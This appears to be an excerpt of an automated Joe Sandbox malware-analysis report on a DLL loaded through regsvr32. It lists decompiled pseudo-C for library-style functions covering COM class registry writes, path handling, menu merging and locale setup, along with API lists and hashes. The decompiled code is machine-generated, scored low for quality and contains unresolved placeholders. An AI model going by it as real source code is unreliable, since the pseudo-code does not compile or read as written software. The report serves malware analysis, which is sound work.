                                                                                                                • Instruction ID: 500abb4394048999830c117a5cab8b51610c075c4a3b407bf1c48366689c28be
                                                                                                                • Opcode Fuzzy Hash: f143f9938d41884723be5508dee54b535352d4842ea16944978db2463053da02
                                                                                                                • Instruction Fuzzy Hash: 3A014C716523307BE2229B669E8CDDB3E6DEF87AE1F000545F20AA2190CB655900C6B4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E1000A4C7(void* __ecx, char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _t27;
                                                                                                                				void* _t28;
                                                                                                                				char* _t30;
                                                                                                                				void* _t31;
                                                                                                                				intOrPtr* _t32;
                                                                                                                
                                                                                                                				_t32 = __imp__CoTreatAsClass;
                                                                                                                				_t28 =  *_t32(_a8, _a12, _t27, _t31, __ecx, __ecx);
                                                                                                                				if(_t28 != 0 && _a4 != 0) {
                                                                                                                					RegOpenKeyA(0x80000000, "CLSID",  &_v12);
                                                                                                                					_v8 = _v8 & 0x00000000;
                                                                                                                					__imp__StringFromCLSID(_a8,  &_v8);
                                                                                                                					_t30 = E10020CCA(_v8);
                                                                                                                					RegSetValueA(_v12, _t30, 1, _a4, lstrlenA(_a4));
                                                                                                                					__imp__CoTaskMemFree(_t30);
                                                                                                                					_t28 =  *_t32(_a8, _a12);
                                                                                                                					RegCloseKey(_v12);
                                                                                                                				}
                                                                                                                				return _t28;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CoTreatAsClass.OLE32(?,?), ref: 1000A4DA
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,CLSID,00000000), ref: 1000A4F6
                                                                                                                • StringFromCLSID.OLE32(?,00000000), ref: 1000A507
                                                                                                                  • Part of subcall function 10020CCA: CoTaskMemFree.OLE32(00000000), ref: 10020CDB
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 1000A51A
                                                                                                                • RegSetValueA.ADVAPI32(00000000,00000000,00000001,00000000,00000000), ref: 1000A52A
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 1000A531
                                                                                                                • CoTreatAsClass.OLE32(?,?), ref: 1000A53D
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1000A544
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassFreeTaskTreat$CloseFromOpenStringValuelstrlen
                                                                                                                • String ID: CLSID
                                                                                                                • API String ID: 2259541326-910414637
                                                                                                                • Opcode ID: 0fb55bce5508f47ccc40d3211df9bbc4f2d4a9c6eba1e501c85bd7d66b1ff4b6
                                                                                                                • Instruction ID: 64bae599c37c4c486c8a5bfdd2905429fbca63f959f3cca092693e514ca3cc27
                                                                                                                • Opcode Fuzzy Hash: 0fb55bce5508f47ccc40d3211df9bbc4f2d4a9c6eba1e501c85bd7d66b1ff4b6
                                                                                                                • Instruction Fuzzy Hash: 7101E976400118FBEF029FA0CD49EEE7FBAEB8A366F104155FA0592120DB719AA4DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E100389C8(signed int __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t75;
                                                                                                                				intOrPtr _t80;
                                                                                                                				signed int _t84;
                                                                                                                				signed int _t85;
                                                                                                                				intOrPtr* _t104;
                                                                                                                				void* _t119;
                                                                                                                				signed int _t123;
                                                                                                                				intOrPtr* _t125;
                                                                                                                				void* _t128;
                                                                                                                				signed int _t131;
                                                                                                                				signed int _t140;
                                                                                                                				void* _t142;
                                                                                                                				signed int* _t144;
                                                                                                                				void* _t178;
                                                                                                                				void* _t180;
                                                                                                                				signed int _t183;
                                                                                                                				void* _t185;
                                                                                                                				signed int _t186;
                                                                                                                				void* _t188;
                                                                                                                				void* _t195;
                                                                                                                				signed int _t198;
                                                                                                                
                                                                                                                				_t195 = __eflags;
                                                                                                                				_t186 = _t188 - 0x400;
                                                                                                                				_t75 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t186 + 0x404) = _t75 ^ _t186;
                                                                                                                				_push(0x1c);
                                                                                                                				E1004764D(0x10090de9, __ebx, __edi, __esi);
                                                                                                                				 *(_t186 - 0x14) =  *(_t186 - 0x14) & 0x00000000;
                                                                                                                				_t178 = __ecx;
                                                                                                                				_t144 =  *(_t186 + 0x414);
                                                                                                                				_t183 =  *_t144;
                                                                                                                				 *((intOrPtr*)(_t186 - 0x10)) =  *((intOrPtr*)(_t186 + 0x410));
                                                                                                                				_t80 =  *((intOrPtr*)(__ecx + 0x74));
                                                                                                                				_t176 =  *(_t80 + 0x34) & 0x00080000;
                                                                                                                				 *(_t186 - 0x24) = _t144;
                                                                                                                				 *(_t186 - 0x28) =  *(_t80 + 0x34) & 0x00080000;
                                                                                                                				_t140 = (__ebx & 0xffffff00 | _t195 != 0x00000000) - 0x00000001 & 0x00000020;
                                                                                                                				if(_t183 !=  *((intOrPtr*)(_t80 + 0x1c))) {
                                                                                                                					L9:
                                                                                                                					_push( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c)));
                                                                                                                					E1000B543(_t140, _t186 - 0x20, _t178, _t183, __eflags);
                                                                                                                					 *(_t186 - 4) =  *(_t186 - 4) & 0x00000000;
                                                                                                                					__eflags =  *(_t186 - 0x28);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t125 =  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c));
                                                                                                                						while(1) {
                                                                                                                							__eflags =  *_t125 - _t140;
                                                                                                                							if( *_t125 == _t140) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t125 = L1004CFCE(_t176, _t178, _t125);
                                                                                                                						}
                                                                                                                						_t128 = E10027DD9(_t186 - 0x20, _t186 - 0x14, _t125 -  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c)));
                                                                                                                						 *(_t186 - 4) = 1;
                                                                                                                						E10018A1F(_t140, _t186 - 0x20, _t186, _t128);
                                                                                                                						__eflags =  *(_t186 - 0x14) + 0xfffffff0;
                                                                                                                						 *(_t186 - 4) = 0;
                                                                                                                						L100013E3( *(_t186 - 0x14) + 0xfffffff0, _t176);
                                                                                                                					}
                                                                                                                					_push(_t183);
                                                                                                                					_t146 = _t186 - 0x18;
                                                                                                                					_t179 = _t183;
                                                                                                                					E1000B543(_t140, _t186 - 0x18, _t183, _t183, __eflags);
                                                                                                                					 *(_t186 - 4) = 2;
                                                                                                                					while(1) {
                                                                                                                						_t84 =  *_t183;
                                                                                                                						__eflags = _t84 - _t140;
                                                                                                                						if(_t84 == _t140) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t84;
                                                                                                                						if(_t84 != 0) {
                                                                                                                							_t123 = L1004CFCE(_t176, _t179, _t183);
                                                                                                                							_pop(_t146);
                                                                                                                							_t183 = _t123;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					__eflags =  *(_t186 - 0x28);
                                                                                                                					if( *(_t186 - 0x28) != 0) {
                                                                                                                						L22:
                                                                                                                						_t85 = L1004CFCE(_t176, _t179, _t183);
                                                                                                                						asm("sbb ecx, ecx");
                                                                                                                						_t146 =  ~( *_t85) & _t85;
                                                                                                                						__eflags = _t146;
                                                                                                                						 *( *(_t186 - 0x24)) = _t146;
                                                                                                                					} else {
                                                                                                                						__eflags =  *_t183;
                                                                                                                						if( *_t183 != 0) {
                                                                                                                							_t119 = E10027DD9(_t186 - 0x18, _t186 - 0x14, _t183 - _t179);
                                                                                                                							 *(_t186 - 4) = 3;
                                                                                                                							E10018A1F(0, _t186 - 0x18, _t186, _t119);
                                                                                                                							__eflags =  *(_t186 - 0x14) + 0xfffffff0;
                                                                                                                							 *(_t186 - 4) = 2;
                                                                                                                							L100013E3( *(_t186 - 0x14) + 0xfffffff0, _t176);
                                                                                                                							goto L22;
                                                                                                                						} else {
                                                                                                                							 *( *(_t186 - 0x24)) = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_push(E1004DE12(_t146, _t176,  *(_t186 - 0x18), _t186 - 0x1c, 3, _t186 + 0x304, 0x100, _t186 + 0x100, 0x100, _t186, 0x100));
                                                                                                                					L1000135C(0, _t146, _t179, 0x100);
                                                                                                                					__eflags =  *((char*)(_t186 - 0x1c));
                                                                                                                					if( *((char*)(_t186 - 0x1c)) != 0) {
                                                                                                                						L26:
                                                                                                                						_push(E1004C6C3(_t176, _t186 + 0x200, 0x104,  *(_t186 - 0x18)));
                                                                                                                						L1000135C(0, _t146, _t179, 0x100);
                                                                                                                					} else {
                                                                                                                						__eflags =  *((char*)(_t186 + 0x304));
                                                                                                                						if(__eflags != 0) {
                                                                                                                							goto L26;
                                                                                                                						} else {
                                                                                                                							_push(0x1009c950);
                                                                                                                							_push(_t186 - 0x20);
                                                                                                                							_push(_t186 - 0x14);
                                                                                                                							_t104 = L1001AD50(0, _t179, 0x100, __eflags);
                                                                                                                							 *(_t186 - 4) = 4;
                                                                                                                							_push(E1004DE12(_t186 - 0x1c, _t176,  *_t104, _t186 - 0x1c, 3, _t186 + 0x304, 0x100, 0, 0, 0, 0));
                                                                                                                							L1000135C(0, _t186 - 0x1c, _t179, 0x100);
                                                                                                                							 *(_t186 - 4) = 2;
                                                                                                                							L100013E3( *(_t186 - 0x14) + 0xfffffff0, _t176);
                                                                                                                							_push(E1004E033( *(_t186 - 0x14) + 0xfffffff0, _t176, _t186 + 0x200, 0x104, _t186 - 0x1c, _t186 + 0x304, _t186 + 0x100, _t186));
                                                                                                                							L1000135C(0,  *(_t186 - 0x14) + 0xfffffff0, _t179, 0x100);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_push(_t186 + 0x200);
                                                                                                                					E1000B543(0,  *((intOrPtr*)(_t186 - 0x10)), _t179, 0x100, __eflags);
                                                                                                                					L100013E3( *(_t186 - 0x18) + 0xfffffff0, _t176);
                                                                                                                					__eflags =  *((intOrPtr*)(_t186 - 0x20)) + 0xfffffff0;
                                                                                                                					L100013E3( *((intOrPtr*)(_t186 - 0x20)) + 0xfffffff0, _t176);
                                                                                                                				} else {
                                                                                                                					if(( *(_t80 + 0x34) & 0x00000200) != 0) {
                                                                                                                						while(1) {
                                                                                                                							_t131 =  *_t183;
                                                                                                                							__eflags = _t131 - _t140;
                                                                                                                							if(_t131 == _t140) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							__eflags = _t131;
                                                                                                                							if(_t131 != 0) {
                                                                                                                								_t183 = L1004CFCE(_t176, _t178, _t183);
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t183 = L1004CFCE(_t176, _t178, _t183);
                                                                                                                						__eflags =  *_t183;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							 *( *(_t186 - 0x24)) =  *( *(_t186 - 0x24)) & 0x00000000;
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						 *_t144 =  *_t144 & 0x00000000;
                                                                                                                						_t198 =  *_t144;
                                                                                                                						L3:
                                                                                                                						_push( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c)));
                                                                                                                						E1000B543(_t140,  *((intOrPtr*)(_t186 - 0x10)), _t178, _t183, _t198);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t186 - 0xc));
                                                                                                                				_pop(_t180);
                                                                                                                				_pop(_t185);
                                                                                                                				_pop(_t142);
                                                                                                                				return E1004763E( *((intOrPtr*)(_t186 - 0x10)), _t142,  *(_t186 + 0x404) ^ _t186, _t176, _t180, _t185);
                                                                                                                			}

























                                                                                                                0x10038b86
                                                                                                                0x10038b8a
                                                                                                                0x10038b8b
                                                                                                                0x10038ba5
                                                                                                                0x10038bae
                                                                                                                0x10038baf
                                                                                                                0x10038bbd
                                                                                                                0x10038bc1
                                                                                                                0x10038bed
                                                                                                                0x10038bee
                                                                                                                0x10038bf3
                                                                                                                0x10038b7c
                                                                                                                0x10038c1e
                                                                                                                0x10038c1f
                                                                                                                0x10038c2a
                                                                                                                0x10038c32
                                                                                                                0x10038c35
                                                                                                                0x10038a22
                                                                                                                0x10038a28
                                                                                                                0x10038a4d
                                                                                                                0x10038a4d
                                                                                                                0x10038a4f
                                                                                                                0x10038a51
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10038a40
                                                                                                                0x10038a42
                                                                                                                0x10038a4b
                                                                                                                0x00000000
                                                                                                                0x10038a4b
                                                                                                                0x00000000
                                                                                                                0x10038a42
                                                                                                                0x10038a59
                                                                                                                0x10038a5b
                                                                                                                0x10038a5f
                                                                                                                0x00000000
                                                                                                                0x10038a61
                                                                                                                0x10038a64
                                                                                                                0x00000000
                                                                                                                0x10038a64
                                                                                                                0x10038a2a
                                                                                                                0x10038a2a
                                                                                                                0x10038a2a
                                                                                                                0x10038a2d
                                                                                                                0x10038a30
                                                                                                                0x10038a36
                                                                                                                0x10038a36
                                                                                                                0x10038a28
                                                                                                                0x10038c40
                                                                                                                0x10038c48
                                                                                                                0x10038c49
                                                                                                                0x10038c4a
                                                                                                                0x10038c5f

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __mbsinc$__splitpath_s$H_prolog3__makepath_s_strcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 545433585-0
                                                                                                                • Opcode ID: 5137689b18e690f37eae60b53203d840e3057c809600e4c49a2b3d76fefc51e7
                                                                                                                • Instruction ID: aaf9fa8b0fb168039b66f9d1cc1dd36aef11b215f2cae815bf9e09dd0da92980
                                                                                                                • Opcode Fuzzy Hash: 5137689b18e690f37eae60b53203d840e3057c809600e4c49a2b3d76fefc51e7
                                                                                                                • Instruction Fuzzy Hash: 2381B0B68006499FEB12DBA4CC81FEE77F8EF04314F140199F655AB282D734AB44CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E1000B587(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t88;
                                                                                                                				struct HMENU__* _t93;
                                                                                                                				int _t94;
                                                                                                                				struct HMENU__* _t102;
                                                                                                                				int _t107;
                                                                                                                				CHAR* _t113;
                                                                                                                				signed int* _t118;
                                                                                                                				void* _t124;
                                                                                                                				signed char _t125;
                                                                                                                				struct HMENU__* _t126;
                                                                                                                				int _t127;
                                                                                                                				signed int _t138;
                                                                                                                				signed int* _t141;
                                                                                                                				char _t143;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				CHAR* _t149;
                                                                                                                				void* _t151;
                                                                                                                
                                                                                                                				_t149 = _t151 - 0xfc;
                                                                                                                				_t88 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_t149[0x100] = _t88 ^ _t149;
                                                                                                                				_push(0x2c);
                                                                                                                				E1004764D(0x1008de1d, __ebx, __edi, __esi);
                                                                                                                				_t143 = _t149[0x114];
                                                                                                                				 *(_t149 - 0x2c) = _t149[0x10c];
                                                                                                                				_t93 = _t149[0x110];
                                                                                                                				 *(_t149 - 0x24) = _t93;
                                                                                                                				 *((intOrPtr*)(_t149 - 0x34)) = 0;
                                                                                                                				 *(_t149 - 0x30) = 0;
                                                                                                                				_t94 = GetMenuItemCount(_t93);
                                                                                                                				 *(_t149 - 0x38) = _t94;
                                                                                                                				 *(_t149 - 0x14) = 0;
                                                                                                                				 *(_t149 - 0x10) = 0;
                                                                                                                				if(_t149[0x118] == 1) {
                                                                                                                					 *(_t149 - 0x10) =  *_t143;
                                                                                                                				}
                                                                                                                				 *(_t149 - 0x18) = 0;
                                                                                                                				if(_t94 <= 0) {
                                                                                                                					L25:
                                                                                                                					 *(_t143 + _t149[0x118] * 4) =  *(_t149 - 0x14);
                                                                                                                					L26:
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t149 - 0xc));
                                                                                                                					_pop(_t144);
                                                                                                                					_pop(_t147);
                                                                                                                					_pop(_t124);
                                                                                                                					return E1004763E( *(_t149 - 0x30), _t124, _t149[0x100] ^ _t149, _t141, _t144, _t147);
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					 *(_t149 - 0x1c) = GetSubMenu( *(_t149 - 0x24),  *(_t149 - 0x18));
                                                                                                                					_t125 = GetMenuState( *(_t149 - 0x24),  *(_t149 - 0x18), 0x400);
                                                                                                                					if( *(_t149 - 0x1c) != 0 || (_t125 & 0x00000800) == 0) {
                                                                                                                						__eflags = _t149[0x11c];
                                                                                                                						 *(_t149 - 0x28) = 0;
                                                                                                                						if(_t149[0x11c] != 0) {
                                                                                                                							__eflags = _t149[0x118] - 5;
                                                                                                                							if(_t149[0x118] == 5) {
                                                                                                                								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 1;
                                                                                                                								if( *((intOrPtr*)(_t143 + 0x14)) == 1) {
                                                                                                                									 *(_t149 - 0x28) = GetSubMenu( *(_t149 - 0x2c),  *(_t149 - 0x10));
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t102 = GetMenuStringA( *(_t149 - 0x24),  *(_t149 - 0x18), _t149, 0x100, 0x400);
                                                                                                                						__eflags =  *(_t149 - 0x1c);
                                                                                                                						if( *(_t149 - 0x1c) == 0) {
                                                                                                                							__eflags = _t102;
                                                                                                                							if(_t102 <= 0) {
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							_push(_t149);
                                                                                                                							_push(GetMenuItemID( *(_t149 - 0x24),  *(_t149 - 0x18)));
                                                                                                                							_t126 = _t125 | 0x00000400;
                                                                                                                							__eflags = _t126;
                                                                                                                							_push(_t126);
                                                                                                                							goto L22;
                                                                                                                						} else {
                                                                                                                							__eflags =  *(_t149 - 0x28);
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t107 = GetMenuItemCount( *(_t149 - 0x1c));
                                                                                                                								__eflags = _t107;
                                                                                                                								if(_t107 == 0) {
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                								_push(_t149);
                                                                                                                								_push( *(_t149 - 0x1c));
                                                                                                                								_push(_t125 & 0x000000ff | 0x00000410);
                                                                                                                								L22:
                                                                                                                								InsertMenuA( *(_t149 - 0x2c),  *(_t149 - 0x10), ??, ??, ??);
                                                                                                                								 *(_t149 - 0x10) =  *(_t149 - 0x10) + 1;
                                                                                                                								_t74 = _t149 - 0x14;
                                                                                                                								 *_t74 =  *(_t149 - 0x14) + 1;
                                                                                                                								__eflags =  *_t74;
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							_push( *((intOrPtr*)(E1001E302(_t125, _t143, 0x400, __eflags) + 0x10)));
                                                                                                                							E1000B543(_t125, _t149 - 0x20, _t143, 0x400, __eflags);
                                                                                                                							_t113 =  *(_t149 - 0x20);
                                                                                                                							 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
                                                                                                                							__eflags =  *(_t113 - 0xc);
                                                                                                                							if( *(_t113 - 0xc) != 0) {
                                                                                                                								L1000AF0C(_t149 - 0x20, 0x20);
                                                                                                                							}
                                                                                                                							E1000B029(_t149 - 0x20, _t149);
                                                                                                                							_t127 =  *(_t149 - 0x1c);
                                                                                                                							AppendMenuA( *(_t149 - 0x28), 0x10, _t127,  *(_t149 - 0x20));
                                                                                                                							 *(_t149 - 4) =  *(_t149 - 4) | 0xffffffff;
                                                                                                                							_t118 = _t143 + _t149[0x118] * 4;
                                                                                                                							 *_t118 =  *_t118 & 0x00000000;
                                                                                                                							 *((intOrPtr*)(_t118 - 4)) =  *((intOrPtr*)(_t118 - 4)) + 1;
                                                                                                                							 *((intOrPtr*)(_t149 - 0x34)) = 1;
                                                                                                                							 *(_t149 - 0x30) = _t127;
                                                                                                                							L100013E3( &(( *(_t149 - 0x20))[0xfffffffffffffff0]), _t141);
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t138 = _t149[0x118];
                                                                                                                						_t141 = _t143 + _t138 * 4;
                                                                                                                						 *_t141 =  *(_t149 - 0x14);
                                                                                                                						 *(_t149 - 0x14) = 0;
                                                                                                                						if(_t138 < 5) {
                                                                                                                							 *(_t149 - 0x10) =  *(_t149 - 0x10) + _t141[1];
                                                                                                                						}
                                                                                                                						_t149[0x118] = _t149[0x118] + 2;
                                                                                                                					}
                                                                                                                					L23:
                                                                                                                					 *(_t149 - 0x18) =  *(_t149 - 0x18) + 1;
                                                                                                                				} while ( *(_t149 - 0x18) <  *(_t149 - 0x38));
                                                                                                                				if( *((intOrPtr*)(_t149 - 0x34)) != 0) {
                                                                                                                					goto L26;
                                                                                                                				}
                                                                                                                				goto L25;
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000B5A6
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1000B5CC
                                                                                                                • GetSubMenu.USER32 ref: 1000B5FF
                                                                                                                • GetMenuState.USER32(?,?,00000400), ref: 1000B60F
                                                                                                                • GetSubMenu.USER32 ref: 1000B66D
                                                                                                                • GetMenuStringA.USER32 ref: 1000B686
                                                                                                                • AppendMenuA.USER32(00000000,00000010,00000000,?), ref: 1000B6DB
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 1000B70E
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 1000B738
                                                                                                                • InsertMenuA.USER32(?,?,00000000,00000000), ref: 1000B748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$Count$AppendH_prolog3InsertStateString
                                                                                                                • String ID:
                                                                                                                • API String ID: 915444591-0
                                                                                                                • Opcode ID: a4eef6a3f4376d49903b0779fc6422aee06ceab9011746bed295798fb85076cb
                                                                                                                • Instruction ID: 3f5d256e697bb0ece931bc901f8766a9fbca0fe627d54b4ac24e569dd544017d
                                                                                                                • Opcode Fuzzy Hash: a4eef6a3f4376d49903b0779fc6422aee06ceab9011746bed295798fb85076cb
                                                                                                                • Instruction Fuzzy Hash: DE615870D00619EFEF11CFA4CD85AEDBBB5FF08395F10402AE915A62A0D7756A94CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E100593ED(void* __ebx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                				void* _t43;
                                                                                                                				intOrPtr* _t51;
                                                                                                                
                                                                                                                				if(_a4 > 5 || _a8 == 0) {
                                                                                                                					L4:
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t51 = E1005496F(8, 1);
                                                                                                                					_t58 = _t51;
                                                                                                                					if(_t51 != 0) {
                                                                                                                						_t13 = E1005496F(0xd8, 1);
                                                                                                                						 *_t51 = _t13;
                                                                                                                						__eflags = _t13;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t14 = E1005496F(0x220, 1);
                                                                                                                							__eflags = _t14;
                                                                                                                							 *((intOrPtr*)(_t51 + 4)) = _t14;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								E10058756( *_t51, 0x100bab30);
                                                                                                                								_push(_a4);
                                                                                                                								_t48 =  *_t51;
                                                                                                                								__eflags = E1005921F(_a8,  *_t51);
                                                                                                                								_pop(_t43);
                                                                                                                								if(__eflags != 0) {
                                                                                                                									__eflags = E10058159(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
                                                                                                                									if(__eflags == 0) {
                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                                                                                                                										L17:
                                                                                                                										return _t51;
                                                                                                                									}
                                                                                                                									_push( *((intOrPtr*)(_t51 + 4)));
                                                                                                                									E100470E9(__ebx, 1, _t51, __eflags);
                                                                                                                									_push( *_t51);
                                                                                                                									E100586CA();
                                                                                                                									E10058504( *_t51);
                                                                                                                									_push(_t51);
                                                                                                                									E100470E9(__ebx, 1, _t51, __eflags);
                                                                                                                									L15:
                                                                                                                									_t51 = 0;
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								_push( *_t51);
                                                                                                                								E100586CA();
                                                                                                                								E10058504( *_t51);
                                                                                                                								_push(_t51);
                                                                                                                								E100470E9(__ebx, 1, _t51, __eflags);
                                                                                                                								goto L15;
                                                                                                                							}
                                                                                                                							_push( *_t51);
                                                                                                                							E100470E9(__ebx, 1, _t51, __eflags);
                                                                                                                							_push(_t51);
                                                                                                                							E100470E9(__ebx, 1, _t51, __eflags);
                                                                                                                							L8:
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						_push(_t51);
                                                                                                                						E100470E9(__ebx, 1, _t51, __eflags);
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					L3:
                                                                                                                					 *((intOrPtr*)(E10049097(_t58))) = 0xc;
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • __calloc_crt.LIBCMT ref: 10059403
                                                                                                                  • Part of subcall function 1005496F: __calloc_impl.LIBCMT ref: 1005497D
                                                                                                                  • Part of subcall function 1005496F: Sleep.KERNEL32(00000000), ref: 10054994
                                                                                                                • __calloc_crt.LIBCMT ref: 10059426
                                                                                                                • __calloc_crt.LIBCMT ref: 10059442
                                                                                                                • __copytlocinfo_nolock.LIBCMT ref: 10059467
                                                                                                                • __setlocale_nolock.LIBCMT ref: 10059476
                                                                                                                • ___removelocaleref.LIBCMT ref: 10059482
                                                                                                                • ___freetlocinfo.LIBCMT ref: 10059489
                                                                                                                • __setmbcp_nolock.LIBCMT ref: 100594A1
                                                                                                                • ___removelocaleref.LIBCMT ref: 100594B6
                                                                                                                • ___freetlocinfo.LIBCMT ref: 100594BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2969281212-0
